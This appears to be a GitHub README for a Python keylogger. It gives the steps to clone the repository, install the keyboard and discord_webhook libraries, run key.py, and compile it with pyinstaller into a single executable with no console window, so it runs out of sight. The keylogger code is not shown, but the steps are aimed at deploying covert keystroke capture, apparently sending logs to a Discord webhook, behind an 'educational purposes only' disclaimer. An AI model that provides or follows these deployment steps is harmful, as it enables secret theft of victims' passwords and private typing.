Clone the repository

https://github.com/rdxkeerthi/keylogger.git 

Install Required Libraries

pip install keyboard 
 pip install discord_webhook
pip install discord_webhook

python logo

Execute the script

To execute the script all you have to do is run:

python key.py 

Compile the script

Now what if you want to turn this into an executable? You can do that with the pyinstaller library that was included in the requirements.txt file.

pyinstaller PATH_TO_SCRIPT --onefile --noconsole

⚠️ DISCLAIMER ⚠️

I am not responsible for any of your actions. This GitHub repository is made for educational purposes only!!!